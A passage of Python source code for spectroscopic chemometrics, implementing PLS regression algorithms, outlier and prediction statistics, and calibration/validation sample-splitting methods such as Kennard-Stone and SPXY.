            b = b[:, np.newaxis]
        if testset_indices is None:
            testset_indices = np.arange(n_test_samples)
        # --------- pretreat the test spectra ---------
        testspec_pretreated = self._spec_pretreat4transform(self.testset_spec_intersect)
        # --------- select wavelength points per variable_indices ---------
        testspec_subset = testspec_pretreated[:, self.variable_indices]
        testx_subset = testspec_subset[1:, :]
        # --------- predict ---------
        predicte_value_temp = dot(testx_subset, b)
        predict_value = self._target_inverse_pretreat(predicte_value_temp)
        # ===================== statistics =====================
        test_x_scores = dot(testx_subset, calx_scores_weights)
        # ---- Leverage & Hotelling TSquared leverage_t2_calc(scores, x_scores)
        leverage_t2_result = leverage_t2_calc(test_x_scores, calx_scores)
        leverage = leverage_t2_result['leverage'][:, -1:]
        t2 = leverage_t2_result['t2'][:, -1:]
        if testset_target is None or n_test_samples < 2:
            # no references (or too few samples): only the basics can be reported
            return {'predict_value': predict_value,
                    'x_scores': test_x_scores,
                    't2': t2,
                    'leverage': leverage}
        else:
            # ---- spectral residuals
            test_q_result = q_calc(calx_loadings, test_x_scores, testx_subset)
            fitting_x_matrix = test_q_result['fitting_x_list'][-1]  # last element = full-nlv model
            residual_matrix = test_q_result['residual_matrix_list'][-1]  # last element, shape (n_test_samples, n_variables)
            test_q = test_q_result['q'][:, -1:]
            test_x_residual = sqrt(test_q_result['q'][:, -1:])  # last column = full-nlv model
            if testset_target.ndim == 1:
                testset_target = testset_target[:, np.newaxis]
            # ---- x_fvalue and x_fprob
            x_fvalue = (n_test_samples - 1) * test_x_residual ** 2 / \
                       (sum(square(test_x_residual), axis=0) - test_x_residual ** 2)
            x_fprob = sps.distributions.f.cdf(x_fvalue, 1, n_test_samples - 1)
            # ---- X outliers by leverage_limit
            x_outlier_indices = testset_indices[np.where(leverage > leverage_limit)[0]]
            # ---- F statistics of the prediction residuals
            test_y_residual = predict_value - testset_target
            y_fvalue = (n_test_samples - 1) * test_y_residual ** 2 / (
                    sum(square(test_y_residual), axis=0) - test_y_residual ** 2)
            y_fprob = sps.distributions.f.cdf(y_fvalue, 1, n_test_samples - 1)
            y_outlier_indices = testset_indices[np.where(abs(y_fprob) > 0.99)[0]]
            # ---- summary statistics
            rmse_statistics = rmse_calc(predict_value, testset_target)
            r2 = rmse_statistics['r2']
            rmsep = rmse_statistics['rmse']
            sep = rmse_statistics['sep']  # A bias corrected version of rmsep
            press = rmse_statistics['press']
            rpd = rmse_statistics['rpd']
            bias = rmse_statistics['bias']
            linear_regression_coefficient = rmse_statistics['linear_regression_coefficient']
            relative_error = rmse_statistics['relative_error']
            # ---- studentized residuals (added 2019-01-28)
            prevent_invalid_for_negetive_sqrt = np.seterr(invalid='ignore')
            y_tvalue = test_y_residual / (rmsep * sqrt(1 - leverage))
            # t-test on whether predictions deviate systematically from the references
            significant_difference_tvalue = np.abs(bias) * sqrt(n_test_samples) / sep
            # two-tailed critical value at 95% (sl = 0.05)
            significant_difference_critical_value = np.array([sps.t.ppf(0.975, n_test_samples)])
            # paired t-test; p-value > 0.05 means no significant difference
            paired_ttest_statistic, paired_ttest_pvalue = sps.ttest_rel(predict_value, testset_target)
            return {'predict_value': predict_value,
                    'x_scores': test_x_scores,
                    'leverage': leverage,
                    't2': t2,
                    'q': test_q,
                    'x_residual': test_x_residual,
                    'fitting_x_list': fitting_x_matrix,
                    'residual_matrix_list': residual_matrix,
                    'x_fvalue': x_fvalue,
                    'x_fprob': x_fprob,
                    'x_outlier_indices': x_outlier_indices,
                    'y_fvalue': y_fvalue,
                    'y_fprob': y_fprob,
                    'y_tvalue': y_tvalue,  # studentized residuals
                    'y_outlier_indices': y_outlier_indices,
                    'r2': r2,
                    'rmsep': rmsep,
                    'sep': sep,
                    'press': press,
                    'rpd': rpd,
                    'bias': bias,
                    'linear_regression_coefficient': linear_regression_coefficient,
                    'relative_error': relative_error,
                    'significant_difference_tvalue': significant_difference_tvalue,
                    'significant_difference_critical_value': significant_difference_critical_value,
                    'paired_ttest_pvalue': paired_ttest_pvalue
                    }
# +++++++++++++++++++++++++++++++++++++++++++++++ Quantitative Algorithm +++++++++++++++++++++++++++++++++++++++++++++++
def ikpls_algorithm(ab, target, max_nlv):
    '''
    Improved Kernel Partial Least Squares (IKPLS).
    :param ab: absorbance matrix, e.g. (100, 700)
    :param target: reference values, (100, 1) or (100,)
    :param max_nlv: maximum number of latent variables; silently capped at
                    min(n_samples, n_variables)
    :return: dict with
        b: regression coefficients, cumulative per latent variable;
           prediction: dot(ab, pls['b'][:, max_nlv-1]) gives a 1-D array,
           dot(ab, pls['b'][:, max_nlv-1:]) gives a 2-D array
        x_weights: X weight matrix w
        x_loadings: X loading matrix p
        x_scores: X score matrix t
        y_loadings: y loading vector q
        x_scores_weights: score weight matrix r (new samples: T = X r)
        max_nlv: number of latent variables actually used
    :raises ValueError: if ab and target disagree on the number of samples
    '''
    n_samples, n_variables = ab.shape
    if n_samples != target.shape[0]:
        raise ValueError('光谱数量与参考值数量不一致!')
    if max_nlv > np.min((n_samples, n_variables)):
        max_nlv = np.min((n_samples, n_variables))
    x_scores = zeros((n_samples, max_nlv))
    x_loadings = zeros((n_variables, max_nlv))
    y_loadings = zeros((1, max_nlv))
    x_weights = zeros((n_variables, max_nlv))
    x_scores_weights = zeros((n_variables, max_nlv))
    xy = dot(ab.T, target).ravel()  # X'y kernel vector, deflated every round
    for i in range(max_nlv):
        w = xy
        w = w / sqrt(dot(w.T, w))  # normalize the weight vector
        r = w
        for j in range(i):  # loop body is skipped when i == 0
            r = r - dot(x_loadings[:, j], w) * x_scores_weights[:, j]
        t = dot(ab, r)
        tt = dot(t.T, t)
        p = dot(ab.T, t) / tt
        q = dot(r.T, xy) / tt
        xy = xy - dot(dot(p, q), tt)  # deflate the kernel vector
        x_weights[:, i] = w
        x_loadings[:, i] = p
        x_scores[:, i] = t
        y_loadings[0, i] = q
        x_scores_weights[:, i] = r
    b = cumsum(dot(x_scores_weights, diag(y_loadings.ravel())), axis=1)
    return {'b': b,
            'x_scores': x_scores,
            'x_loadings': x_loadings,
            'y_loadings': y_loadings,
            'x_scores_weights': x_scores_weights,
            'x_weights': x_weights,
            'max_nlv':max_nlv}
def nipals_algorithm(ab, target, max_nlv):  # e.g. ab (700, 700), target (700, 1) or (700,), max_nlv 15
    '''
    Nonlinear Iterative Partial Least Squares (NIPALS).
    :param ab: absorbance matrix; deflated (rank-1) once per latent variable
    :param target: reference values, 2-D column or 1-D
    :param max_nlv: maximum number of latent variables; silently capped at
                    min(n_samples, n_variables)
    :return: dict with b, x_scores, x_loadings, y_loadings,
             x_scores_weights, x_weights
    :raises ValueError: if ab and target disagree on the number of samples
    '''
    n_samples, n_variables = ab.shape
    if n_samples != target.shape[0]:
        raise ValueError('光谱数量与参考值数量不一致!')
    if max_nlv > np.min((n_samples, n_variables)):
        max_nlv = np.min((n_samples, n_variables))
    x_scores = zeros((n_samples, max_nlv))
    x_loadings = zeros((n_variables, max_nlv))
    y_loadings = zeros((1, max_nlv))
    x_weights = zeros((n_variables, max_nlv))
    for i in range(max_nlv):
        xy = dot(ab.T, target).ravel()
        x_weights[:, i] = xy / norm(xy)
        x_scores[:, i] = dot(ab, x_weights[:, i])
        x_loadings[:, i] = dot(ab.T, x_scores[:, i]) / dot(x_scores[:, i].T, x_scores[:, i])
        y_loadings[0, i] = dot(x_scores[:, i].T, target) / dot(x_scores[:, i].T, x_scores[:, i])
        ab = ab - outer(x_scores[:, i], x_loadings[:, i])  # rank-1 deflation via the outer product
    x_scores_weights = dot(x_weights, inv(dot(x_loadings.T, x_weights)))
    b = cumsum(dot(x_scores_weights, diag(y_loadings.ravel())), axis=1)  # y_loadings flattened to 1-D
    return {'b': b, 'x_scores': x_scores, 'x_loadings': x_loadings, 'y_loadings': y_loadings, \
            'x_scores_weights': x_scores_weights, 'x_weights': x_weights}
def simpls_algorithm(ab, target, max_nlv):
    '''
    Straightforward Implementation of a statistically inspired Modification
    of the Partial Least Squares (SIMPLS).
    :param ab: absorbance matrix
    :param target: reference values; promoted to a column vector if 1-D
    :param max_nlv: maximum number of latent variables; silently capped at
                    min(n_samples, n_variables)
    :return: dict with b, x_scores, x_loadings, y_loadings,
             x_scores_weights (same array as x_weights), x_weights, y_scores
    :raises ValueError: if ab and target disagree on the number of samples
    '''
    n_samples, n_variables = ab.shape
    if np.ndim(target) == 1:
        target = target[:, np.newaxis]
    if n_samples != target.shape[0]:
        raise ValueError('光谱数量与参考值数量不一致!')
    if max_nlv > np.min((n_samples, n_variables)):
        max_nlv = np.min((n_samples, n_variables))
    V = zeros((n_variables, max_nlv))
    x_scores = zeros((n_samples, max_nlv))  # X scores (standardized)
    x_weights = zeros((n_variables, max_nlv))  # X weights
    x_loadings = zeros((n_variables, max_nlv))  # X loadings
    y_loadings = zeros((1, max_nlv))  # Y loadings
    y_scores = zeros((n_samples, max_nlv))  # Y scores
    s = dot(ab.T, target).ravel()  # cross-product vector between ab and target
    for i in range(max_nlv):
        r = s
        t = dot(ab, r)
        tt = norm(t)
        t = t / tt
        r = r / tt
        p = dot(ab.T, t)
        q = dot(target.T, t)
        u = dot(target, q)
        v = p  # orthogonal basis of the loadings P
        if i > 0:
            v = v - dot(V, dot(V.T, p))  # Gram-Schmidt orthogonalization
            u = u - dot(x_scores, dot(x_scores.T, u))
        v = v / norm(v)
        s = s - dot(v, dot(v.T, s))  # deflate the cross-product vector
        x_weights[:, i] = r
        x_scores[:, i] = t
        x_loadings[:, i] = p
        y_loadings[:, i] = q
        y_scores[:, i] = u
        V[:, i] = v
    b = cumsum(dot(x_weights, diag(y_loadings.ravel())), axis=1)
    return {'b': b, 'x_scores': x_scores, 'x_loadings': x_loadings, 'y_loadings': y_loadings, \
            'x_scores_weights': x_weights, 'x_weights': x_weights, 'y_scores':y_scores}
# +++++++++++++++++++++++++++++++++++++++++++++++ Sampling Algorithm +++++++++++++++++++++++++++++++++++++++++++++++
# Note: All the sampling indices should be sorted, using np.sort()
def cv_kfold_random_sampling(n_population, kfold=9, seed=999):
    '''
    Random k-fold cross-validation split.

    The first ``n % kfold`` folds have size ``n // kfold + 1``,
    other folds have size ``n // kfold``, where ``n`` is the number of samples.

    Note: each fold is drawn independently from the whole population, so a
    sample may land in the test fold of more than one iteration.

    :param n_population: total number of samples
    :param kfold: number of folds
    :param seed: seed for the random number generator (reproducibility)
    :return: (train_indices_list, test_indices_list), one entry per fold
    '''
    train_indices_list = []
    test_indices_list = []
    rng = np.random.RandomState(seed)
    # np.int / np.bool were removed in NumPy >= 1.24; use the builtin types.
    fold_sizes = (n_population // kfold) * np.ones(kfold, dtype=int)  # base fold size
    fold_sizes[:n_population % kfold] += 1  # first 'n % kfold' folds get one extra
    population_indices = np.arange(n_population)
    for i in range(kfold):
        mask = zeros(n_population, dtype=bool)
        test_indices = rng.choice(population_indices, fold_sizes[i], replace=False)
        mask[test_indices] = True  # mark selected test samples
        train_indices = np.arange(n_population)[~mask]  # remainder forms the training set
        test_indices_list.append(test_indices)
        train_indices_list.append(train_indices)
    return train_indices_list, test_indices_list
def cv_kfold_systematic_sampling(n_population, kfold=9):
    '''
    Systematic (evenly spaced) k-fold cross-validation split: fold ``i``
    takes indices ``i, i + kfold, i + 2*kfold, ...``.

    The first ``n % kfold`` folds have size ``n // kfold + 1``,
    other folds have size ``n // kfold``, where ``n`` is the number of samples.

    :param n_population: total number of samples
    :param kfold: number of folds
    :return: (train_indices_list, test_indices_list), one entry per fold
    '''
    train_indices_list = []
    test_indices_list = []
    # np.int / np.bool were removed in NumPy >= 1.24; use the builtin types.
    fold_sizes = ((n_population // kfold) + 1 ) * np.ones(kfold, dtype=int)
    fold_sizes[n_population % kfold:] -= 1  # trailing folds hold one sample less
    for i in range(kfold):
        mask = zeros(n_population, dtype=bool)
        test_indices = np.linspace(start=i, stop=kfold*(fold_sizes[i] - 1) + i, num=fold_sizes[i], dtype=int)
        test_indices_list.append(test_indices)
        mask[test_indices] = True
        train_indices = np.arange(n_population)[~mask]
        train_indices_list.append(train_indices)
    return train_indices_list, test_indices_list
def cv_lpo_random_sampling(n_population, p=3, seed=999):
    '''
    Random leave-p-out style split where the test folds partition the
    population: all folds but the last have size ``p``; when ``n`` is not
    divisible by ``p`` the last fold has size ``n % p``.

    :param n_population: total number of samples
    :param p: number of samples left out per fold
    :param seed: seed for the random number generator
    :return: (train_indices_list, test_indices_list), one entry per fold
    '''
    mod = n_population % p
    # np.int was removed in NumPy >= 1.24; use the builtin int.
    # (The redundant pre-computation of kfold via ceiling division was dead
    # code — it was always overwritten below — and has been removed.)
    if mod == 0:
        kfold = n_population // p
        fold_sizes = p * np.ones(kfold, dtype=int)
    else:
        kfold = n_population // p + 1  # equivalent to math.ceil(n_population / p)
        fold_sizes = p * np.ones(kfold, dtype=int)
        fold_sizes[-1] = mod
    train_indices_list = []
    test_indices_list = []
    rng = np.random.RandomState(seed)
    population_indices = np.arange(n_population)
    temp_left_indices = population_indices
    for i in range(kfold):
        # draw only from indices not yet used as test samples, so the test
        # folds are disjoint and together cover the whole population
        test_indices = rng.choice(temp_left_indices, fold_sizes[i], replace=False)
        train_indices = np.setdiff1d(population_indices, test_indices)  # training set
        test_indices_list.append(test_indices)
        train_indices_list.append(train_indices)
        temp_left_indices = np.setdiff1d(temp_left_indices, test_indices)
    return train_indices_list, test_indices_list
def cv_lpo_systematic_sampling(n_population, p=3):
    '''
    Leave-p-out with systematic sampling: fold ``i`` takes the evenly spaced
    indices ``i, i + interval, i + 2*interval, ...`` (interval = n // p).
    When ``n`` is not divisible by ``p``, the last fold holds the trailing
    ``n % p`` indices.

    :param n_population: total number of samples
    :param p: number of samples left out per fold
    :return: (train_indices_list, test_indices_list), one entry per fold
    '''
    population_indices = np.arange(n_population, dtype=int)
    train_indices_list = []
    test_indices_list = []
    mod = n_population % p
    # np.int was removed in NumPy >= 1.24; use the builtin int.
    # ================ evenly divisible ================
    if mod == 0:
        kfold = n_population // p
        interval = n_population // p
        fold_sizes = p * np.ones(kfold, dtype=int)
        for i in range(kfold):
            test_indices = np.linspace(start=i, stop=(fold_sizes[i] - 1) * interval + i, num=fold_sizes[i], dtype=int)
            test_indices_list.append(test_indices)
            train_indices = np.setdiff1d(population_indices, test_indices)
            train_indices_list.append(train_indices)
    # ================ not evenly divisible ================
    else:
        kfold = n_population // p + 1
        interval = n_population // p
        fold_sizes = p * np.ones(kfold, dtype=int)
        fold_sizes[-1] = mod  # last fold holds the remainder, e.g. 14 % 4 = 2
        # ---------------- first (kfold - 1) folds ----------------
        for i in range(kfold - 1):
            test_indices = np.linspace(start=i, stop=(fold_sizes[i] - 1) * interval + i, num=fold_sizes[i], dtype=int)
            test_indices_list.append(test_indices)
            train_indices = np.setdiff1d(population_indices, test_indices)
            train_indices_list.append(train_indices)
        # ---------------- last fold: trailing remainder ----------------
        last_fold_test_indices = population_indices[-mod:]
        last_fold_train_indices = np.setdiff1d(population_indices, last_fold_test_indices)
        # ---------------- append the last fold ----------------
        test_indices_list.append(last_fold_test_indices)
        train_indices_list.append(last_fold_train_indices)
    return train_indices_list, test_indices_list
def montecarlo_sampling(n_population, test_size=0.2, seed=999):
    '''
    Monte-Carlo (random hold-out) sampling.

    :param n_population: total number of samples
    :param test_size: fraction of samples assigned to the test set
    :param seed: seed for the random number generator
    :return: (train_indices, test_indices), both sorted ascending
    '''
    rng = np.random.RandomState(seed)
    n_test = int(n_population * test_size)  # e.g. 81 * 0.2 = 16
    # np.bool was removed in NumPy >= 1.24; use the builtin bool.
    mask = zeros(n_population, dtype=bool)
    a = np.arange(n_population)
    rng.shuffle(a)  # kept so the RNG draws (and thus the selection) stay reproducible
    test_indices = rng.choice(a, n_test, replace=False)
    mask[test_indices] = True
    train_indices = np.arange(n_population)[~mask]
    # ================ sort both index sets ================
    # (a single final sort suffices; the earlier duplicate sort was removed)
    train_indices.sort()
    test_indices.sort()
    return train_indices, test_indices
def ks_sampling(X, p=3, population_indices=None):
    '''
    Kennard-Stone sampling: select ``p`` samples that span the data space.
    The two mutually most distant samples are taken first; each subsequent
    pick is the sample with the largest min-distance to the already-selected
    set. The pick order carries meaning, so only the returned train set is
    sorted, not the selection process itself.
    :param X: absorbance matrix (samples in rows)
    :param p: number of samples to select
    :param population_indices: optional index labels for the samples
    :return: (train_indices, test_indices)
    '''
    n_samples, n_variables = X.shape
    if population_indices is None:
        population_indices = np.arange(n_samples)
    # full pairwise Euclidean distance matrix
    D = squareform(pdist(X, metric='euclidean'))
    temp_index = []
    # seed the selection with the two samples farthest apart
    index_2max = where(D == D.max())[0]
    temp_index.append(index_2max[0])
    temp_index.append(index_2max[1])
    retained_D = D[:, temp_index]
    retained_D[temp_index, :] = 0  # zero out selected rows so they cannot be re-picked
    for k in range(p - 2):
        # max-min criterion; NOTE(review): `min`/`max` here accept axis/keepdims,
        # so they are assumed to be NumPy's amin/amax via a star import — confirm
        choice_index = where(retained_D == max(min(retained_D, axis=1, keepdims=True)))[0][0]
        temp_index.append(choice_index)
        retained_D = D[:, temp_index]
        retained_D[temp_index, :] = 0
    train_indices = np.sort(population_indices[temp_index])
    test_indices = np.setdiff1d(population_indices, train_indices)
    return train_indices, test_indices
def spxy_sampling(X, y, p=3, population_indices=None):
    '''
    SPXY sampling (sample-set partitioning based on joint x-y distances):
    Kennard-Stone-style max-min selection on the sum of the max-normalized
    spectral and concentration distance matrices. The pick order carries
    meaning, so the returned selection is not re-sorted.
    :param X: absorbance matrix (samples in rows)
    :param y: reference values; promoted to a column vector if 1-D
    :param p: number of samples to select
    :param population_indices: optional index labels for the samples
    :return: (cal_indices, val_indices)
    '''
    n_samples, n_variables = X.shape
    if y.ndim == 1:
        y = y[:, np.newaxis]
    if population_indices is None:
        population_indices = np.arange(n_samples)
    # ----------- spectral (x) distance matrix -----------
    D_ab = zeros((n_samples, n_samples))
    for i in range(n_samples - 1):
        for j in range(i+1, n_samples):
            D_ab[i, j] = norm(X[i, :]-X[j, :])
    D_ab += D_ab.T
    D_ab_max = np.max(D_ab)
    # ----------- concentration (y) distance matrix -----------
    D_con = zeros((n_samples, n_samples))
    for i in range(n_samples - 1):
        for j in range(i+1, n_samples):
            D_con[i, j] = norm(y[i, :]-y[j, :])
    D_con += D_con.T
    D_con_max = np.max(D_con)
    # ----------- combined, max-normalized distance -----------
    D = D_ab / D_ab_max + D_con / D_con_max
    # ----------- KS-style max-min selection -----------
    temp_index = []
    index_2max = where(D == D.max())[0]
    temp_index.append(index_2max[0])
    temp_index.append(index_2max[1])
    retained_D = D[:, temp_index]
    retained_D[temp_index, :] = 0  # zero out selected rows so they cannot be re-picked
    for k in range(p - 2):
        # NOTE(review): `min`/`max` here accept axis/keepdims, so they are
        # assumed to be NumPy's amin/amax via a star import — confirm
        choice_index = where(retained_D == max(min(retained_D, axis=1, keepdims=True)))[0][0]
        temp_index.append(choice_index)
        retained_D = D[:, temp_index]
        retained_D[temp_index, :] = 0
    cal_indices = population_indices[temp_index]
    val_indices = np.setdiff1d(population_indices, cal_indices)
    return cal_indices, val_indices
def samples_systematic_split(X, val_size=0.1, test_size=0, population_indices=None):
    '''
    Split samples into train / validation / test sets by systematic
    (evenly spaced) sampling, so the subsets follow the same distribution.
    :param X: absorbance matrix (samples in rows)
    :param val_size: fraction of samples for the validation set
    :param test_size: fraction of samples for the test set
    :param population_indices: optional index labels for the samples
    :return: (train_indices, val_indices, test_indices), each sorted ascending
    :raises ValueError: if val_size + test_size >= 1
    '''
    n_population = X.shape[0]
    if (val_size + test_size) >= 1.0:
        raise ValueError('Wrong parameters of the sampling ratio!')
    n_val = int(n_population * val_size)
    n_test = int(n_population * test_size)
    n_train = n_population - n_val - n_test
    n_val_test = n_val + n_test
    # NOTE(review): assumes n_val_test >= 1; val_size = test_size = 0 would
    # divide by zero below — confirm callers guarantee at least one held-out sample
    if population_indices is None:
        population_indices = np.arange(n_population)
    # -------------- first pick the val+test set, evenly spaced --------------
    interval_1 = n_population // n_val_test
    if interval_1 > 1:
        val_test_indices = np.array([population_indices[interval_1 * i - 1] for i in range(1, n_val_test+1)])
    elif interval_1 == 1:  # not enough room for equal spacing: take every 2nd, then fill from the evens
        val_test_indices_first = np.array([population_indices[2 * i - 1] for i in range(1, n_population//2 + 1)])
        val_test_indices_last = np.array([population_indices[2 * i] for i in range(1, n_val_test - n_population//2 + 1)])
        val_test_indices = np.hstack((val_test_indices_first, val_test_indices_last))
    train_indices = np.setdiff1d(population_indices, val_test_indices)
    if n_test == 0:
        val_indices = val_test_indices
        test_indices = np.setdiff1d(val_test_indices, val_indices)
    elif n_val == 0:
        test_indices = val_test_indices
        val_indices = np.setdiff1d(val_test_indices, test_indices)
    # -------------- then pick the valset out of the val+test set, evenly spaced --------------
    else:
        interval_2 = n_val_test // n_val  # pick the validation set first
        if interval_2 > 1:
            val_indices = np.array([val_test_indices[interval_2 * j - 1] for j in range(1, n_val + 1)])
        elif interval_2 == 1:
            val_indices_first = np.array([val_test_indices[2 * j - 1] for j in range(1, n_val_test//2 + 1)])
            val_indices_last = np.array([val_test_indices[2 * j] for j in range(1, n_val - n_val_test // 2 + 1)])
            val_indices = np.hstack((val_indices_first, val_indices_last))
        test_indices = np.setdiff1d(val_test_indices, val_indices)
    # ================ sort all three index sets ================
    train_indices.sort()
    val_indices.sort()
    test_indices.sort()
    return train_indices, val_indices, test_indices
def samples_ks_split(X, val_size=0.1, test_size=0.1, population_indices=None):
    '''
    Split samples into train / validation / test sets via Kennard-Stone:
    first pick the training set from all samples, then pick the validation
    set (again with KS) from the remainder.
    :param X: absorbance matrix (samples in rows)
    :param val_size: fraction of samples for the validation set
    :param test_size: fraction of samples for the test set
    :param population_indices: optional index labels for the samples
    :return: (train_indices, val_indices, test_indices), each sorted ascending
    :raises ValueError: if val_size + test_size >= 1
    '''
    total = X.shape[0]
    if (val_size + test_size) >= 1.0:
        raise ValueError('Wrong parameters of the sampling ratio!')
    size_val = int(total * val_size)
    size_test = int(total * test_size)
    size_train = total - size_val - size_test
    if population_indices is None:
        population_indices = np.arange(total)
    # step 1: KS pick of the training set
    train_indices, rest_indices = ks_sampling(X, size_train, population_indices=population_indices)
    rest_set = X[rest_indices, :]
    if size_test == 0:
        val_indices = rest_indices
        test_indices = np.setdiff1d(rest_indices, val_indices)
    elif size_val == 0:
        test_indices = rest_indices
        val_indices = np.setdiff1d(rest_indices, test_indices)
    else:
        # step 2: KS pick of the validation set from the remainder
        val_indices, test_indices = ks_sampling(rest_set, size_val, population_indices=rest_indices)
    # sort all three index sets ascending
    for indices in (train_indices, val_indices, test_indices):
        indices.sort()
    return train_indices, val_indices, test_indices
def samples_spxy_split(X, target, val_size=0.1, test_size=0.1, population_indices=None):
    '''
    Split samples into train / validation / test sets via SPXY distances on
    (X, target): first pick the training set from all samples, then pick the
    validation set (again with SPXY) from the remainder.
    :param X: absorbance matrix (samples in rows)
    :param target: reference values used in the SPXY distance
    :param val_size: fraction of samples for the validation set
    :param test_size: fraction of samples for the test set
    :param population_indices: optional index labels for the samples
    :return: (train_indices, val_indices, test_indices), each sorted ascending
    :raises ValueError: if val_size + test_size >= 1
    '''
    if target.ndim == 1:
        target = target[:, np.newaxis]
    total = X.shape[0]
    if (val_size + test_size) >= 1.0:
        raise ValueError('Wrong parameters of the sampling ratio!')
    size_val = int(total * val_size)
    size_test = int(total * test_size)
    size_train = total - size_val - size_test
    if population_indices is None:
        population_indices = np.arange(total)
    # step 1: SPXY pick of the training set
    train_indices, rest_indices = spxy_sampling(X, target,
                                                size_train, population_indices=population_indices)
    rest_ab = X[rest_indices, :]
    rest_con = target[rest_indices, :]
    if size_test == 0:
        val_indices = rest_indices
        test_indices = np.setdiff1d(rest_indices, val_indices)
    elif size_val == 0:
        test_indices = rest_indices
        val_indices = np.setdiff1d(rest_indices, test_indices)
    else:
        # step 2: SPXY pick of the validation set from the remainder
        val_indices, test_indices = spxy_sampling(rest_ab, rest_con,
                                                  size_val, population_indices=rest_indices)
    # sort all three index sets ascending
    for indices in (train_indices, val_indices, test_indices):
        indices.sort()
    return train_indices, val_indices, test_indices
def samples_random_split(X, val_size=0.1, test_size=0.1, seed=999, population_indices=None):
    '''
    Randomly split samples into train / validation / test index sets.
    :param X: absorbance matrix (samples in rows)
    :param val_size: fraction of samples for the validation set
    :param test_size: fraction of samples for the test set
    :param seed: seed for the random number generator
    :param population_indices: optional index labels for the samples
    :return: (train_indices, val_indices, test_indices), each sorted ascending
    :raises ValueError: if val_size + test_size >= 1
    '''
    rng = np.random.RandomState(seed)
    total = X.shape[0]
    if (val_size + test_size) >= 1.0:
        raise ValueError('Wrong parameters of the sampling ratio!')
    size_val = int(total * val_size)
    size_test = int(total * test_size)
    size_train = total - size_val - size_test
    if population_indices is None:
        population_indices = np.arange(total)
    # draw the training set first, then the validation set from the rest;
    # the two rng.choice calls keep the original call order for reproducibility
    train_indices = population_indices[rng.choice(total, size_train, replace=False)]
    rest_indices = np.setdiff1d(population_indices, train_indices)
    val_indices = rest_indices[rng.choice(size_val + size_test, size_val, replace=False)]
    test_indices = np.setdiff1d(rest_indices, val_indices)
    # sort all three index sets ascending
    for indices in (train_indices, val_indices, test_indices):
        indices.sort()
    return train_indices, val_indices, test_indices
# +++++++++++++++++++++++++++++++++++++++++++++++ Utilities +++++++++++++++++++++++++++++++++++++++++++++++
class PLSR(object):
    '''
    PLS Regression wrapper: select the PLS algorithm and the maximum number
    of latent variables, then calibrate and predict.
    Required inputs: absorbance matrix (with a wavelength row) and reference
    values. All spectra must be made compatible beforehand.
    '''
    def __init__(self, algorithm='ikpls_algorithm', max_nlv=10):
        # algorithm: name of a module-level PLS function
        # ('ikpls_algorithm', 'nipals_algorithm' or 'simpls_algorithm')
        self.algorithm = algorithm
        self.max_nlv = max_nlv
        return
    def fit(self, cal_spec, cal_target):
        '''
        Run the PLS regression and store its result in self.pls_result
        (b, x_scores, x_loadings, y_loadings, x_scores_weights, x_weights, max_nlv).
        :param cal_spec: spectra matrix whose row 0 is the wavelength axis
                         (built by pretreat.ConstructCompatiblePLSBand().fit_construct)
        :param cal_target: reference values, 1-D or column vector
        :return: self
        '''
        if cal_target.ndim == 1:
            cal_target = cal_target[:, np.newaxis]  # 2-D for broadcast computations
        cal_ab = cal_spec[1:, :]  # strip the wavelength row
        # --------- cap max_nlv at the matrix-rank bound ---------
        if self.max_nlv > np.min((cal_ab.shape[0], cal_ab.shape[1])):
            self.max_nlv = np.min((cal_ab.shape[0], cal_ab.shape[1]))
        # --------- run the PLS regression ---------
        # look the algorithm up by name instead of eval(): identical for the
        # supported names, without eval's arbitrary-code-execution risk
        self.pls_result = globals()[self.algorithm](cal_ab, cal_target, self.max_nlv)
        return self
    def fit_predict(self, cal_spec, cal_target):
        '''
        Calibrate on (cal_spec, cal_target) and return the fitted values plus
        the calibration-model data.
        :return: dict with b, fit_value, algorithm, max_nlv, pls_result,
                 x_loadings, x_scores, x_scores_weights, model_ab and
                 pls_calibration_model (the same data bundled for storage)
        '''
        cal_ab = cal_spec[1:, :]
        self.model_ab = cal_ab
        if cal_target.ndim == 1:
            cal_target = cal_target[:, np.newaxis]  # 2-D for broadcast computations
        self.fit(cal_spec, cal_target)
        # pls_result (e.g. from ikpls_algorithm) provides:
        # b, x_scores, x_loadings, y_loadings, x_scores_weights, x_weights, max_nlv
        b = self.pls_result['b']
        calx_scores = self.pls_result['x_scores']
        calx_loadings = self.pls_result['x_loadings']
        calx_scores_weights = self.pls_result['x_scores_weights']
        fit_value = dot(cal_ab, b)  # fitted values for every latent-variable count
        pls_calibration_model = {'b':b,
                                 'fit_value': fit_value,
                                 'algorithm': self.algorithm,
                                 'max_nlv': self.max_nlv,
                                 'pls_result': self.pls_result,
                                 'x_loadings': calx_loadings,
                                 'x_scores': calx_scores,
                                 'x_scores_weights':calx_scores_weights,
                                 'model_ab': self.model_ab}
        return {'b':b,
                'fit_value': fit_value,
                'algorithm': self.algorithm,
                'max_nlv': self.max_nlv,
                'pls_result': self.pls_result,
                'x_loadings': calx_loadings,
                'x_scores_weights': calx_scores_weights,
                'x_scores': calx_scores,
                'model_ab': self.model_ab,
                'pls_calibration_model': pls_calibration_model}
    def val_predict(self, val_spec):
        '''
        Predict with the model fitted on this instance; usable both for
        samples without reference values and for validation-set evaluation.
        :param val_spec: spectra matrix whose row 0 is the wavelength axis
        :return: dict with 'predict_value' (one column per latent-variable count)
        '''
        val_ab = val_spec[1:, :]
        b = self.pls_result['b']
        predict_value = dot(val_ab, b)
        return {'predict_value':predict_value}
def q_calc(calx_loadings, scores, pretreated_data):
    '''
    Q statistic (squared prediction error, SPE) plus residual/explained-
    variance bookkeeping for each number of latent variables.

    The Q statistic represents variability in the residual subspace, while
    Hotelling's T^2 covers the principal-component subspace.
    For PCA validation pass the pretreated data; for PLS, the pretreated
    absorbance matrix.

    :param calx_loadings: x_loadings of the calibration model
    :param scores: scores of the samples under evaluation
    :param pretreated_data: pretreated data fed into the pca/pls algorithm
    :return: dict with q, f_residuals, residual/fitted matrix lists and the
             explained-variance summaries (see the returned keys)
    '''
    def _as_2d(arr):
        # promote a 1-D array to a single-column 2-D array
        return arr[:, np.newaxis] if arr.ndim == 1 else arr

    calx_loadings = _as_2d(calx_loadings)
    scores = _as_2d(scores)
    pretreated_data = _as_2d(pretreated_data)
    n_samples, n_lv = scores.shape
    n_variables = calx_loadings.shape[0]
    q = zeros((n_samples, n_lv))  # a.k.a. the Squared Prediction Error (SPE)
    f_residuals = zeros((n_samples, n_lv))
    residual_matrix_list = []
    fitting_x_list = []
    x_variable_residuals = zeros((n_variables, n_lv))
    x_sample_residuals = zeros((n_samples, n_lv))
    for lv in range(n_lv):
        fitted = dot(scores[:, :lv + 1], calx_loadings[:, :lv + 1].T)
        resid = pretreated_data - fitted
